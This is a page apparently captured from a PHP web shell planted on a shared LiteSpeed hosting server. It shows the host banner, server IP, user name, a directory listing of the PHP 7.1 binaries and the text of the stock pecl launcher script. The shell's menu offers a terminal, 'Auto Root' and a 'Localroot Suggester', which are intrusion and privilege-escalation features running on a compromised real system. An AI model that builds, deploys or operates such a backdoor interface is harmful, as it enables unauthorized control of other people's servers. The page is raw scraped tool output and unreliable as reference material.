Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.105
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
apps /
php71 /
bin /
Delete
Unzip
Name
Size
Permission
Date
Action
fpmctl
2.38
KB
-rwxr-xr-x
2025-02-25 04:06
fpmctl71
1.74
KB
-rwxr-xr-x
2024-10-29 07:35
lsphp
23.66
MB
-rwxr-xr-x
2024-10-29 07:34
memcapable
276.02
KB
-rwxr-xr-x
2024-10-29 07:40
memcat
83.51
KB
-rwxr-xr-x
2024-10-29 07:40
memcp
82.75
KB
-rwxr-xr-x
2024-10-29 07:40
memdump
73.44
KB
-rwxr-xr-x
2024-10-29 07:40
memerror
63.76
KB
-rwxr-xr-x
2024-10-29 07:40
memexist
71.78
KB
-rwxr-xr-x
2024-10-29 07:40
memflush
70.82
KB
-rwxr-xr-x
2024-10-29 07:40
memparse
35.4
KB
-rwxr-xr-x
2024-10-29 07:40
memping
76.16
KB
-rwxr-xr-x
2024-10-29 07:40
memrm
72.78
KB
-rwxr-xr-x
2024-10-29 07:40
memslap
121.76
KB
-rwxr-xr-x
2024-10-29 07:40
memstat
92.59
KB
-rwxr-xr-x
2024-10-29 07:40
memtouch
72.16
KB
-rwxr-xr-x
2024-10-29 07:40
pear
872
B
-rwxr-xr-x
2024-10-29 07:21
peardev
893
B
-rwxr-xr-x
2024-10-29 07:21
pecl
806
B
-rwxr-xr-x
2024-10-29 07:21
phar
14.48
KB
-rwxr-xr-x
2024-10-29 07:34
phar.phar
14.48
KB
-rwxr-xr-x
2024-10-29 07:34
php
23.78
MB
-rwxr-xr-x
2024-10-29 07:34
php-cgi
23.63
MB
-rwxr-xr-x
2024-10-29 07:34
php-config
5.57
KB
-rwxr-xr-x
2024-10-29 07:34
phpdbg
24.65
MB
-rwxr-xr-x
2024-10-29 07:34
phpize
4.48
KB
-rwxr-xr-x
2024-10-29 07:34
Save
Rename
#!/bin/sh # first find which PHP binary to use if test "x$PHP_PEAR_PHP_BIN" != "x"; then PHP="$PHP_PEAR_PHP_BIN" else if test "/usr/local/apps/php71/bin/php" = '@'php_bin'@'; then PHP=php else PHP="/usr/local/apps/php71/bin/php" fi fi # then look for the right pear include dir if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then INCDIR=$PHP_PEAR_INSTALL_DIR INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR" else if test "/usr/local/apps/php71/lib/php" = '@'php_dir'@'; then INCDIR=`dirname $0` INCARG="" else INCDIR="/usr/local/apps/php71/lib/php" INCARG="-d include_path=/usr/local/apps/php71/lib/php" fi fi exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d safe_mode=0 -d register_argc_argv="On" $INCDIR/peclcmd.php "$@"